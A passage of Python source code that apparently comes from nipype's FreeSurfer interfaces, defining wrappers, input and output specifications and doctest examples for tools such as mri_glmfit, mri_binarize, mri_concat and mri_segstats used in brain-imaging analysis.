'mris_preproc --hemi lh --out concatenated_file.mgz --target fsaverage --iv cont1.nii register.dat --iv cont1a.nii register.dat'
"""
_cmd = 'mris_preproc'
input_spec = MRISPreprocInputSpec
output_spec = MRISPreprocOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.out_file
outputs['out_file'] = outfile
if not isdefined(outfile):
outputs['out_file'] = os.path.join(os.getcwd(),
'concat_%s_%s.mgz' % (self.inputs.hemi,
self.inputs.target))
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._list_outputs()[name]
return None
class MRISPreprocReconAllInputSpec(MRISPreprocInputSpec):
surf_measure_file = File(exists=True, argstr='--meas %s',
xor=('surf_measure',
'surf_measure_file', 'surf_area'),
desc='file necessary for surfmeas')
surfreg_file = File(
argstr="--surfreg %s", desc="Input surface registration file")
subject_id = traits.String(argstr='--s %s',
xor=(
'subjects', 'fsgd_file', 'subject_file', 'subject_id'),
desc='subject from who measures are calculated')
class MRISPreprocReconAll(MRISPreproc):
"""Extends MRISPreproc to allow it to be used in a recon-all workflow
Examples
--------
>>> preproc = MRISPreprocReconAll()
>>> preproc.inputs.target = 'fsaverage'
>>> preproc.inputs.hemi = 'lh'
>>> preproc.inputs.vol_measure_file = [('cont1.nii', 'register.dat'), \
('cont1a.nii', 'register.dat')]
>>> preproc.inputs.out_file = 'concatenated_file.mgz'
>>> preproc.cmdline
'mris_preproc --hemi lh --out concatenated_file.mgz --target fsaverage --iv cont1.nii register.dat --iv cont1a.nii register.dat'
"""
input_spec = MRISPreprocReconAllInputSpec
def _verify_file_location(self, filepath, name):
head, tail = os.path.split(filepath)
surf_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'surf')
if head != surf_dir:
raise traits.TraitError(
"MRIS_PreprocReconAll: {0} must be located in subjects_dir/subject_id/surf\
instead a file location of {1} was given".format(name, filepath))
def _format_arg(self, name, spec, value):
if name in ("surfreg_file", "surf_measure_file"):
self._verify_file_location(value, name)
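            # Caveat (descriptive note): str.lstrip strips a leading character *set*,
            # not a literal prefix, so the chained lstrip('rh.').lstrip('lh.') below
            # also removes any extra leading 'r', 'h', 'l' or '.' characters
            # (e.g. 'lh.hippocampus' would become 'ippocampus').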
return spec.argstr % os.path.basename(value).lstrip('rh.').lstrip('lh.')
return super(MRISPreprocReconAll, self)._format_arg(name, spec, value)
class GLMFitInputSpec(FSTraitedSpec):
glm_dir = traits.Str(argstr='--glmdir %s', desc='save outputs to dir',
genfile=True)
in_file = File(desc='input 4D file', argstr='--y %s', mandatory=True,
copyfile=False)
_design_xor = ('fsgd', 'design', 'one_sample')
fsgd = traits.Tuple(File(exists=True), traits.Enum('doss', 'dods'),
argstr='--fsgd %s %s', xor=_design_xor,
desc='freesurfer descriptor file')
design = File(exists=True, argstr='--X %s', xor=_design_xor,
desc='design matrix file')
contrast = InputMultiPath(File(exists=True), argstr='--C %s...',
desc='contrast file')
one_sample = traits.Bool(argstr='--osgm',
xor=('one_sample', 'fsgd', 'design', 'contrast'),
desc='construct X and C as a one-sample group mean')
no_contrast_sok = traits.Bool(argstr='--no-contrasts-ok',
desc='do not fail if no contrasts specified')
per_voxel_reg = InputMultiPath(File(exists=True), argstr='--pvr %s...',
desc='per-voxel regressors')
self_reg = traits.Tuple(traits.Int, traits.Int, traits.Int,
argstr='--selfreg %d %d %d',
desc='self-regressor from index col row slice')
weighted_ls = File(exists=True, argstr='--wls %s',
xor=('weight_file', 'weight_inv', 'weight_sqrt'),
desc='weighted least squares')
fixed_fx_var = File(exists=True, argstr='--yffxvar %s',
desc='for fixed effects analysis')
fixed_fx_dof = traits.Int(argstr='--ffxdof %d',
xor=['fixed_fx_dof_file'],
desc='dof for fixed effects analysis')
fixed_fx_dof_file = File(argstr='--ffxdofdat %d',
xor=['fixed_fx_dof'],
desc='text file with dof for fixed effects analysis')
weight_file = File(exists=True, xor=['weighted_ls'],
desc='weight for each input at each voxel')
weight_inv = traits.Bool(argstr='--w-inv', desc='invert weights',
xor=['weighted_ls'])
weight_sqrt = traits.Bool(argstr='--w-sqrt', desc='sqrt of weights',
xor=['weighted_ls'])
fwhm = traits.Range(low=0.0, argstr='--fwhm %f',
desc='smooth input by fwhm')
var_fwhm = traits.Range(low=0.0, argstr='--var-fwhm %f',
desc='smooth variance by fwhm')
no_mask_smooth = traits.Bool(argstr='--no-mask-smooth',
desc='do not mask when smoothing')
no_est_fwhm = traits.Bool(argstr='--no-est-fwhm',
desc='turn off FWHM output estimation')
mask_file = File(exists=True, argstr='--mask %s', desc='binary mask')
label_file = File(exists=True, argstr='--label %s',
xor=['cortex'],
desc='use label as mask, surfaces only')
cortex = traits.Bool(argstr='--cortex',
xor=['label_file'],
desc='use subjects ?h.cortex.label as label')
invert_mask = traits.Bool(argstr='--mask-inv',
desc='invert mask')
prune = traits.Bool(argstr='--prune',
desc='remove voxels that do not have a non-zero value at each frame (def)')
no_prune = traits.Bool(argstr='--no-prune',
xor=['prunethresh'],
desc='do not prune')
prune_thresh = traits.Float(argstr='--prune_thr %f',
xor=['noprune'],
desc='prune threshold. Default is FLT_MIN')
compute_log_y = traits.Bool(argstr='--logy',
desc='compute natural log of y prior to analysis')
save_estimate = traits.Bool(argstr='--yhat-save',
desc='save signal estimate (yhat)')
save_residual = traits.Bool(argstr='--eres-save',
desc='save residual error (eres)')
save_res_corr_mtx = traits.Bool(argstr='--eres-scm',
desc='save residual error spatial correlation matrix (eres.scm). Big!')
surf = traits.Bool(argstr="--surf %s %s %s",
requires=["subject_id", "hemi"],
desc="analysis is on a surface mesh")
subject_id = traits.Str(desc="subject id for surface geometry")
hemi = traits.Enum("lh", "rh", desc="surface hemisphere")
surf_geo = traits.Str("white", usedefault=True,
desc="surface geometry name (e.g. white, pial)")
simulation = traits.Tuple(traits.Enum('perm', 'mc-full', 'mc-z'),
traits.Int(min=1), traits.Float, traits.Str,
argstr='--sim %s %d %f %s',
desc='nulltype nsim thresh csdbasename')
sim_sign = traits.Enum('abs', 'pos', 'neg', argstr='--sim-sign %s',
desc='abs, pos, or neg')
uniform = traits.Tuple(traits.Float, traits.Float,
argstr='--uniform %f %f',
desc='use uniform distribution instead of gaussian')
pca = traits.Bool(argstr='--pca',
desc='perform pca/svd analysis on residual')
calc_AR1 = traits.Bool(argstr='--tar1',
desc='compute and save temporal AR1 of residual')
save_cond = traits.Bool(argstr='--save-cond',
desc='flag to save design matrix condition at each voxel')
vox_dump = traits.Tuple(traits.Int, traits.Int, traits.Int,
argstr='--voxdump %d %d %d',
desc='dump voxel GLM and exit')
seed = traits.Int(argstr='--seed %d', desc='used for synthesizing noise')
synth = traits.Bool(argstr='--synth', desc='replace input with gaussian')
resynth_test = traits.Int(argstr='--resynthtest %d', desc='test GLM by resynthsis')
profile = traits.Int(argstr='--profile %d', desc='niters : test speed')
force_perm = traits.Bool(argstr='--perm-force',
                             desc='force permutation test, even when design matrix is not orthog')
    diag = traits.Int('--diag %d', desc='Gdiag_no : set diagnostic level')
diag_cluster = traits.Bool(argstr='--diag-cluster',
desc='save sig volume and exit from first sim loop')
debug = traits.Bool(argstr='--debug', desc='turn on debugging')
check_opts = traits.Bool(argstr='--checkopts',
desc="don't run anything, just check options and exit")
allow_repeated_subjects = traits.Bool(argstr='--allowsubjrep',
                                          desc='allow subject names to repeat in the fsgd file (must appear before --fsgd)')
allow_ill_cond = traits.Bool(argstr='--illcond',
desc='allow ill-conditioned design matrices')
sim_done_file = File(argstr='--sim-done %s',
desc='create file when simulation finished')
class GLMFitOutputSpec(TraitedSpec):
glm_dir = Directory(exists=True, desc="output directory")
beta_file = File(exists=True, desc="map of regression coefficients")
error_file = File(desc="map of residual error")
error_var_file = File(desc="map of residual error variance")
error_stddev_file = File(desc="map of residual error standard deviation")
estimate_file = File(desc="map of the estimated Y values")
mask_file = File(desc="map of the mask used in the analysis")
fwhm_file = File(desc="text file with estimated smoothness")
dof_file = File(desc="text file with effective degrees-of-freedom for the analysis")
gamma_file = OutputMultiPath(desc="map of contrast of regression coefficients")
gamma_var_file = OutputMultiPath(desc="map of regression contrast variance")
sig_file = OutputMultiPath(desc="map of F-test significance (in -log10p)")
ftest_file = OutputMultiPath(desc="map of test statistic values")
spatial_eigenvectors = File(desc="map of spatial eigenvectors from residual PCA")
frame_eigenvectors = File(desc="matrix of frame eigenvectors from residual PCA")
singular_values = File(desc="matrix singular values from residual PCA")
svd_stats_file = File(desc="text file summarizing the residual PCA")
class GLMFit(FSCommand):
"""Use FreeSurfer's mri_glmfit to specify and estimate a general linear model.
Examples
--------
>>> glmfit = GLMFit()
>>> glmfit.inputs.in_file = 'functional.nii'
>>> glmfit.inputs.one_sample = True
>>> glmfit.cmdline == 'mri_glmfit --glmdir %s --y functional.nii --osgm'%os.getcwd()
True
"""
_cmd = 'mri_glmfit'
input_spec = GLMFitInputSpec
output_spec = GLMFitOutputSpec
def _format_arg(self, name, spec, value):
if name == "surf":
_si = self.inputs
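            # Illustrative expansion (hypothetical subject id): with subject_id='subj01',
            # hemi='lh' and the default surf_geo='white', surf=True becomes
            # '--surf subj01 lh white'.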
return spec.argstr % (_si.subject_id, _si.hemi, _si.surf_geo)
return super(GLMFit, self)._format_arg(name, spec, value)
def _list_outputs(self):
outputs = self.output_spec().get()
# Get the top-level output directory
if not isdefined(self.inputs.glm_dir):
glmdir = os.getcwd()
else:
glmdir = os.path.abspath(self.inputs.glm_dir)
outputs["glm_dir"] = glmdir
# Assign the output files that always get created
outputs["beta_file"] = os.path.join(glmdir, "beta.mgh")
outputs["error_var_file"] = os.path.join(glmdir, "rvar.mgh")
outputs["error_stddev_file"] = os.path.join(glmdir, "rstd.mgh")
outputs["mask_file"] = os.path.join(glmdir, "mask.mgh")
outputs["fwhm_file"] = os.path.join(glmdir, "fwhm.dat")
outputs["dof_file"] = os.path.join(glmdir, "dof.dat")
# Assign the conditional outputs
if isdefined(self.inputs.save_residual) and self.inputs.save_residual:
outputs["error_file"] = os.path.join(glmdir, "eres.mgh")
if isdefined(self.inputs.save_estimate) and self.inputs.save_estimate:
outputs["estimate_file"] = os.path.join(glmdir, "yhat.mgh")
# Get the contrast directory name(s)
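        # e.g. a contrast file named 'group_diff.mtx' (hypothetical) yields the
        # output directory <glm_dir>/group_diff for its sig/F/gamma maps.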
if isdefined(self.inputs.contrast):
contrasts = []
for c in self.inputs.contrast:
if split_filename(c)[2] in [".mat", ".dat", ".mtx", ".con"]:
contrasts.append(split_filename(c)[1])
else:
contrasts.append(os.path.split(c)[1])
elif isdefined(self.inputs.one_sample) and self.inputs.one_sample:
contrasts = ["osgm"]
# Add in the contrast images
outputs["sig_file"] = [os.path.join(glmdir, c, "sig.mgh") for c in contrasts]
outputs["ftest_file"] = [os.path.join(glmdir, c, "F.mgh") for c in contrasts]
outputs["gamma_file"] = [os.path.join(glmdir, c, "gamma.mgh") for c in contrasts]
outputs["gamma_var_file"] = [os.path.join(glmdir, c, "gammavar.mgh") for c in contrasts]
# Add in the PCA results, if relevant
if isdefined(self.inputs.pca) and self.inputs.pca:
pcadir = os.path.join(glmdir, "pca-eres")
outputs["spatial_eigenvectors"] = os.path.join(pcadir, "v.mgh")
outputs["frame_eigenvectors"] = os.path.join(pcadir, "u.mtx")
outputs["singluar_values"] = os.path.join(pcadir, "sdiag.mat")
outputs["svd_stats_file"] = os.path.join(pcadir, "stats.dat")
return outputs
def _gen_filename(self, name):
if name == 'glm_dir':
return os.getcwd()
return None
class OneSampleTTest(GLMFit):
def __init__(self, **kwargs):
super(OneSampleTTest, self).__init__(**kwargs)
self.inputs.one_sample = True
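# A minimal usage sketch for OneSampleTTest (hypothetical filename); it is simply
# GLMFit with one_sample pre-set, so the resulting command line mirrors the GLMFit
# example above:
#   ttest = OneSampleTTest()
#   ttest.inputs.in_file = 'functional.nii'
#   ttest.cmdline   # 'mri_glmfit --glmdir <cwd> --y functional.nii --osgm'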
class BinarizeInputSpec(FSTraitedSpec):
in_file = File(exists=True, argstr='--i %s', mandatory=True,
copyfile=False, desc='input volume')
min = traits.Float(argstr='--min %f', xor=['wm_ven_csf'],
desc='min thresh')
max = traits.Float(argstr='--max %f', xor=['wm_ven_csf'],
desc='max thresh')
rmin = traits.Float(argstr='--rmin %f',
desc='compute min based on rmin*globalmean')
rmax = traits.Float(argstr='--rmax %f',
desc='compute max based on rmax*globalmean')
match = traits.List(traits.Int, argstr='--match %d...',
desc='match instead of threshold')
wm = traits.Bool(argstr='--wm',
desc='set match vals to 2 and 41 (aseg for cerebral WM)')
ventricles = traits.Bool(argstr='--ventricles',
desc='set match vals those for aseg ventricles+choroid (not 4th)')
wm_ven_csf = traits.Bool(argstr='--wm+vcsf', xor=['min', 'max'],
desc='WM and ventricular CSF, including choroid (not 4th)')
binary_file = File(argstr='--o %s', genfile=True,
desc='binary output volume')
out_type = traits.Enum('nii', 'nii.gz', 'mgz', argstr='',
desc='output file type')
count_file = traits.Either(traits.Bool, File,
argstr='--count %s',
desc='save number of hits in ascii file (hits, ntotvox, pct)')
bin_val = traits.Int(argstr='--binval %d',
desc='set vox within thresh to val (default is 1)')
bin_val_not = traits.Int(argstr='--binvalnot %d',
desc='set vox outside range to val (default is 0)')
invert = traits.Bool(argstr='--inv',
desc='set binval=0, binvalnot=1')
frame_no = traits.Int(argstr='--frame %s',
desc='use 0-based frame of input (default is 0)')
merge_file = File(exists=True, argstr='--merge %s',
desc='merge with mergevol')
mask_file = File(exists=True, argstr='--mask maskvol',
desc='must be within mask')
mask_thresh = traits.Float(argstr='--mask-thresh %f',
desc='set thresh for mask')
abs = traits.Bool(argstr='--abs',
desc='take abs of invol first (ie, make unsigned)')
bin_col_num = traits.Bool(argstr='--bincol',
desc='set binarized voxel value to its column number')
zero_edges = traits.Bool(argstr='--zero-edges',
desc='zero the edge voxels')
zero_slice_edge = traits.Bool(argstr='--zero-slice-edges',
desc='zero the edge slice voxels')
dilate = traits.Int(argstr='--dilate %d',
desc='niters: dilate binarization in 3D')
erode = traits.Int(argstr='--erode %d',
desc='nerode: erode binarization in 3D (after any dilation)')
erode2d = traits.Int(argstr='--erode2d %d',
desc='nerode2d: erode binarization in 2D (after any 3D erosion)')
class BinarizeOutputSpec(TraitedSpec):
binary_file = File(exists=True, desc='binarized output volume')
count_file = File(desc='ascii file containing number of hits')
class Binarize(FSCommand):
"""Use FreeSurfer mri_binarize to threshold an input volume
Examples
--------
>>> binvol = Binarize(in_file='structural.nii', min=10, binary_file='foo_out.nii')
>>> binvol.cmdline
'mri_binarize --o foo_out.nii --i structural.nii --min 10.000000'
"""
_cmd = 'mri_binarize'
input_spec = BinarizeInputSpec
output_spec = BinarizeOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.binary_file
if not isdefined(outfile):
if isdefined(self.inputs.out_type):
outfile = fname_presuffix(self.inputs.in_file,
newpath=os.getcwd(),
suffix='.'.join(('_thresh',
self.inputs.out_type)),
use_ext=False)
else:
outfile = fname_presuffix(self.inputs.in_file,
newpath=os.getcwd(),
suffix='_thresh')
outputs['binary_file'] = os.path.abspath(outfile)
value = self.inputs.count_file
if isdefined(value):
if isinstance(value, bool):
if value:
outputs['count_file'] = fname_presuffix(self.inputs.in_file,
suffix='_count.txt',
newpath=os.getcwd(),
use_ext=False)
else:
outputs['count_file'] = value
return outputs
def _format_arg(self, name, spec, value):
if name == 'count_file':
if isinstance(value, bool):
fname = self._list_outputs()[name]
else:
fname = value
return spec.argstr % fname
if name == 'out_type':
return ''
return super(Binarize, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'binary_file':
return self._list_outputs()[name]
return None
class ConcatenateInputSpec(FSTraitedSpec):
in_files = InputMultiPath(File(exists=True),
desc='Individual volumes to be concatenated',
argstr='--i %s...', mandatory=True)
concatenated_file = File(desc='Output volume', argstr='--o %s',
genfile=True)
sign = traits.Enum('abs', 'pos', 'neg', argstr='--%s',
                       desc='Take only pos or neg voxels from input, or take abs')
stats = traits.Enum('sum', 'var', 'std', 'max', 'min', 'mean', argstr='--%s',
desc='Compute the sum, var, std, max, min or mean of the input volumes')
paired_stats = traits.Enum('sum', 'avg', 'diff', 'diff-norm', 'diff-norm1',
'diff-norm2', argstr='--paired-%s',
desc='Compute paired sum, avg, or diff')
gmean = traits.Int(argstr='--gmean %d',
desc='create matrix to average Ng groups, Nper=Ntot/Ng')
mean_div_n = traits.Bool(argstr='--mean-div-n',
desc='compute mean/nframes (good for var)')
multiply_by = traits.Float(argstr='--mul %f',
desc='Multiply input volume by some amount')
add_val = traits.Float(argstr='--add %f',
desc='Add some amount to the input volume')
multiply_matrix_file = File(exists=True, argstr='--mtx %s',
desc='Multiply input by an ascii matrix in file')
combine = traits.Bool(argstr='--combine',
desc='Combine non-zero values into single frame volume')
keep_dtype = traits.Bool(argstr='--keep-datatype',
                             desc='Keep voxelwise precision type (default is float)')
max_bonfcor = traits.Bool(argstr='--max-bonfcor',
desc='Compute max and bonferroni correct (assumes -log10(ps))')
max_index = traits.Bool(argstr='--max-index',
desc='Compute the index of max voxel in concatenated volumes')
mask_file = File(exists=True, argstr='--mask %s', desc='Mask input with a volume')
vote = traits.Bool(argstr='--vote',
                       desc='Most frequent value at each voxel and fraction of occurrences')
sort = traits.Bool(argstr='--sort',
desc='Sort each voxel by ascending frame value')
class ConcatenateOutputSpec(TraitedSpec):
concatenated_file = File(exists=True,
desc='Path/name of the output volume')
class Concatenate(FSCommand):
"""Use Freesurfer mri_concat to combine several input volumes
into one output volume. Can concatenate by frames, or compute
a variety of statistics on the input volumes.
Examples
--------
Combine two input volumes into one volume with two frames
>>> concat = Concatenate()
>>> concat.inputs.in_files = ['cont1.nii', 'cont2.nii']
>>> concat.inputs.concatenated_file = 'bar.nii'
>>> concat.cmdline
'mri_concat --o bar.nii --i cont1.nii --i cont2.nii'
"""
_cmd = 'mri_concat'
input_spec = ConcatenateInputSpec
output_spec = ConcatenateOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if not isdefined(self.inputs.concatenated_file):
outputs['concatenated_file'] = os.path.join(os.getcwd(),
'concat_output.nii.gz')
else:
outputs['concatenated_file'] = self.inputs.concatenated_file
return outputs
def _gen_filename(self, name):
if name == 'concatenated_file':
return self._list_outputs()[name]
return None
class SegStatsInputSpec(FSTraitedSpec):
_xor_inputs = ('segmentation_file', 'annot', 'surf_label')
segmentation_file = File(exists=True, argstr='--seg %s', xor=_xor_inputs,
mandatory=True, desc='segmentation volume path')
annot = traits.Tuple(traits.Str, traits.Enum('lh', 'rh'), traits.Str,
argstr='--annot %s %s %s', xor=_xor_inputs,
mandatory=True,
desc='subject hemi parc : use surface parcellation')
surf_label = traits.Tuple(traits.Str, traits.Enum('lh', 'rh'), traits.Str,
argstr='--slabel %s %s %s', xor=_xor_inputs,
mandatory=True,
desc='subject hemi label : use surface label')
summary_file = File(argstr='--sum %s', genfile=True,
desc='Segmentation stats summary table file')
partial_volume_file = File(exists=True, argstr='--pv %s',
desc='Compensate for partial voluming')
in_file = File(exists=True, argstr='--i %s',
desc='Use the segmentation to report stats on this volume')
frame = traits.Int(argstr='--frame %d',
desc='Report stats on nth frame of input volume')
multiply = traits.Float(argstr='--mul %f', desc='multiply input by val')
calc_snr = traits.Bool(argstr='--snr', desc='save mean/std as extra column in output table')
calc_power = traits.Enum('sqr', 'sqrt', argstr='--%s',
desc='Compute either the sqr or the sqrt of the input')
_ctab_inputs = ('color_table_file', 'default_color_table', 'gca_color_table')
color_table_file = File(exists=True, argstr='--ctab %s', xor=_ctab_inputs,
desc='color table file with seg id names')
default_color_table = traits.Bool(argstr='--ctab-default', xor=_ctab_inputs,
desc='use $FREESURFER_HOME/FreeSurferColorLUT.txt')
gca_color_table = File(exists=True, argstr='--ctab-gca %s', xor=_ctab_inputs,
desc='get color table from GCA (CMA)')
segment_id = traits.List(argstr='--id %s...', desc='Manually specify segmentation ids')
exclude_id = traits.Int(argstr='--excludeid %d', desc='Exclude seg id from report')
exclude_ctx_gm_wm = traits.Bool(argstr='--excl-ctxgmwm',
desc='exclude cortical gray and white matter')
wm_vol_from_surf = traits.Bool(argstr='--surf-wm-vol', desc='Compute wm volume from surf')
cortex_vol_from_surf = traits.Bool(argstr='--surf-ctx-vol', desc='Compute cortex volume from surf')
non_empty_only = traits.Bool(argstr='--nonempty', desc='Only report nonempty segmentations')
empty = traits.Bool(argstr="--empty", mandatory=False,
desc="Report on segmentations listed in the color table")
mask_file = File(exists=True, argstr='--mask %s',
                     desc='Mask volume (same size as seg)')
mask_thresh = traits.Float(argstr='--maskthresh %f',
desc='binarize mask with this threshold <0.5>')
mask_sign = traits.Enum('abs', 'pos', 'neg', '--masksign %s',
desc='Sign for mask threshold: pos, neg, or abs')
mask_frame = traits.Int('--maskframe %d',
requires=['mask_file'],
desc='Mask with this (0 based) frame of the mask volume')
mask_invert = traits.Bool(argstr='--maskinvert', desc='Invert binarized mask volume')
mask_erode = traits.Int(argstr='--maskerode %d', desc='Erode mask by some amount')
brain_vol = traits.Enum('brain-vol-from-seg', 'brainmask', argstr='--%s',
desc='Compute brain volume either with ``brainmask`` or ``brain-vol-from-seg``')
brainmask_file = File(argstr="--brainmask %s", exists=True,
desc="Load brain mask and compute the volume of the brain as the non-zero voxels in this volume")
etiv = traits.Bool(argstr='--etiv', desc='Compute ICV from talairach transform')
etiv_only = traits.Enum('etiv', 'old-etiv', '--%s-only',
desc='Compute etiv and exit. Use ``etiv`` or ``old-etiv``')
avgwf_txt_file = traits.Either(traits.Bool, File, argstr='--avgwf %s',
desc='Save average waveform into file (bool or filename)')
avgwf_file = traits.Either(traits.Bool, File, argstr='--avgwfvol %s',
desc='Save as binary volume (bool or filename)')
sf_avg_file = traits.Either(traits.Bool, File, argstr='--sfavg %s',
desc='Save mean across space and time')
vox = traits.List(traits.Int, argstr='--vox %s',
desc='Replace seg with all 0s except at C R S (three int inputs)')
supratent = traits.Bool(argstr="--supratent",
desc="Undocumented input flag")
subcort_gm = traits.Bool(argstr="--subcortgray",
desc="Compute volume of subcortical gray matter")
total_gray = traits.Bool(argstr="--totalgray",
desc="Compute volume of total gray matter")
euler = traits.Bool(argstr="--euler",
desc="Write out number of defect holes in orig.nofix based on the euler number")
in_intensity = File(argstr="--in %s --in-intensity-name %s", mandatory=False,
desc="Undocumented input norm.mgz file")
intensity_units = traits.Enum('MR', argstr="--in-intensity-units %s",
requires=["in_intensity"], desc="Intensity units")
class SegStatsOutputSpec(TraitedSpec):
summary_file = File(exists=True, desc='Segmentation summary statistics table')
avgwf_txt_file = File(desc='Text file with functional statistics averaged over segs')
avgwf_file = File(desc='Volume with functional statistics averaged over segs')
    sf_avg_file = File(desc='Text file with func statistics averaged over segs and frames')
class SegStats(FSCommand):
"""Use FreeSurfer mri_segstats for ROI analysis
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> ss = fs.SegStats()
>>> ss.inputs.annot = ('PWS04', 'lh', 'aparc')
>>> ss.inputs.in_file = 'functional.nii'
>>> ss.inputs.subjects_dir = '.'
>>> ss.inputs.avgwf_txt_file = './avgwf.txt'
>>> ss.inputs.summary_file = './summary.stats'
>>> ss.cmdline
'mri_segstats --annot PWS04 lh aparc --avgwf ./avgwf.txt --i functional.nii --sum ./summary.stats'
"""
_cmd = 'mri_segstats'
input_spec = SegStatsInputSpec
output_spec = SegStatsOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if isdefined(self.inputs.summary_file):
outputs['summary_file'] = os.path.abspath(self.inputs.summary_file)
else:
outputs['summary_file'] = os.path.join(os.getcwd(), 'summary.stats')
suffices = dict(avgwf_txt_file='_avgwf.txt', avgwf_file='_avgwf.nii.gz',
sf_avg_file='sfavg.txt')
if isdefined(self.inputs.segmentation_file):
_, src = os.path.split(self.inputs.segmentation_file)
if isdefined(self.inputs.annot):
src = '_'.join(self.inputs.annot)
if isdefined(self.inputs.surf_label):
src = '_'.join(self.inputs.surf_label)
for name, suffix in list(suffices.items()):
value = getattr(self.inputs, name)
if isdefined(value):
if isinstance(value, bool):
outputs[name] = fname_presuffix(src, suffix=suffix,
newpath=os.getcwd(),
use_ext=False)
else:
outputs[name] = os.path.abspath(value)
return outputs
def _format_arg(self, name, spec, value):
if name in ['avgwf_txt_file', 'avgwf_file', 'sf_avg_file']:
if isinstance(value, bool):
fname = self._list_outputs()[name]
else:
fname = value
return spec.argstr % fname
elif name == 'in_intensity':
intensity_name = os.path.basename(
self.inputs.in_intensity).replace('.mgz', '')
return spec.argstr % (value, intensity_name)
return super(SegStats, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'summary_file':
return self._list_outputs()[name]
return None
class SegStatsReconAllInputSpec(SegStatsInputSpec):
# recon-all input requirements
subject_id = traits.String(argstr="--subject %s", mandatory=True,
desc="Subject id being processed")
ribbon = traits.File(mandatory=True, exists=True,
desc="Input file mri/ribbon.mgz")
presurf_seg = File(mandatory=True, exists=True,
desc="Input segmentation volume")
transform = File(mandatory=True, exists=True,
desc="Input transform file")
lh_orig_nofix = File(mandatory=True, exists=True,
desc="Input lh.orig.nofix")
rh_orig_nofix = File(mandatory=True, exists=True,
desc="Input rh.orig.nofix")
lh_white = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/lh.white")
rh_white = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/rh.white")
lh_pial = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/lh.pial")
rh_pial = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/rh.pial")
class SegStatsReconAll(SegStats):
"""
    This class inherits SegStats and modifies it for use in a recon-all workflow.
    This implementation mandates implicit inputs that SegStats does not make
    mandatory; to ensure backwards compatibility of SegStats, this class was created.
    Examples
    ========
>>> from nipype.interfaces.freesurfer import SegStatsReconAll
>>> segstatsreconall = SegStatsReconAll()
>>> segstatsreconall.inputs.annot = ('PWS04', 'lh', 'aparc')
>>> segstatsreconall.inputs.avgwf_txt_file = './avgwf.txt'
>>> segstatsreconall.inputs.summary_file = './summary.stats'
>>> segstatsreconall.inputs.subject_id = '10335'
>>> segstatsreconall.inputs.ribbon = 'wm.mgz'
>>> segstatsreconall.inputs.transform = 'trans.mat'
>>> segstatsreconall.inputs.presurf_seg = 'wm.mgz'
>>> segstatsreconall.inputs.lh_orig_nofix = 'lh.pial'
>>> segstatsreconall.inputs.rh_orig_nofix = 'lh.pial'
>>> segstatsreconall.inputs.lh_pial = 'lh.pial'
>>> segstatsreconall.inputs.rh_pial = 'lh.pial'
>>> segstatsreconall.inputs.lh_white = 'lh.pial'
>>> segstatsreconall.inputs.rh_white = 'lh.pial'
>>> segstatsreconall.inputs.empty = True
>>> segstatsreconall.inputs.brain_vol = 'brain-vol-from-seg'
>>> segstatsreconall.inputs.exclude_ctx_gm_wm = True
>>> segstatsreconall.inputs.supratent = True
>>> segstatsreconall.inputs.subcort_gm = True
>>> segstatsreconall.inputs.etiv = True
>>> segstatsreconall.inputs.wm_vol_from_surf = True
>>> segstatsreconall.inputs.cortex_vol_from_surf = True
>>> segstatsreconall.inputs.total_gray = True
>>> segstatsreconall.inputs.euler = True
>>> segstatsreconall.inputs.exclude_id = 0
>>> segstatsreconall.cmdline
'mri_segstats --annot PWS04 lh aparc --avgwf ./avgwf.txt --brain-vol-from-seg --surf-ctx-vol --empty --etiv --euler --excl-ctxgmwm --excludeid 0 --subcortgray --subject 10335 --sum ./summary.stats --supratent --totalgray --surf-wm-vol'
"""
input_spec = SegStatsReconAllInputSpec
output_spec = SegStatsOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if isdefined(self.inputs.summary_file):
outputs['summary_file'] = os.path.abspath(self.inputs.summary_file)
elif isdefined(self.inputs.segmentation_file) and isdefined(self.inputs.subjects_dir):
basename = os.path.basename(
self.inputs.segmentation_file).replace('.mgz', '.stats')
outputs['summary_file'] = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'stats', basename)
else:
outputs['summary_file'] = os.path.join(
os.getcwd(), 'summary.stats')
suffices = dict(avgwf_txt_file='_avgwf.txt', avgwf_file='_avgwf.nii.gz',
sf_avg_file='sfavg.txt')
if isdefined(self.inputs.segmentation_file):
_, src = os.path.split(self.inputs.segmentation_file)
if isdefined(self.inputs.annot):
src = '_'.join(self.inputs.annot)
if isdefined(self.inputs.surf_label):
src = '_'.join(self.inputs.surf_label)
for name, suffix in suffices.items():
value = getattr(self.inputs, name)
if isdefined(value):
if isinstance(value, bool):
outputs[name] = fname_presuffix(src, suffix=suffix,
newpath=os.getcwd(),
use_ext=False)
else:
outputs[name] = os.path.abspath(value)
return outputs
class Label2VolInputSpec(FSTraitedSpec):
label_file = InputMultiPath(File(exists=True), argstr='--label %s...',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
copyfile=False,
mandatory=True,
desc='list of label files')
annot_file = File(exists=True, argstr='--annot %s',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
requires=('subject_id', 'hemi'),
mandatory=True,
copyfile=False,
desc='surface annotation file')
seg_file = File(exists=True, argstr='--seg %s',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
mandatory=True,
copyfile=False,
desc='segmentation file')
aparc_aseg = traits.Bool(argstr='--aparc+aseg',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
mandatory=True,
desc='use aparc+aseg.mgz in subjectdir as seg')
template_file = File(exists=True, argstr='--temp %s', mandatory=True,
desc='output template volume')
reg_file = File(exists=True, argstr='--reg %s',
xor=('reg_file', 'reg_header', 'identity'),
desc='tkregister style matrix VolXYZ = R*LabelXYZ')
reg_header = File(exists=True, argstr='--regheader %s',
xor=('reg_file', 'reg_header', 'identity'),
desc='label template volume')
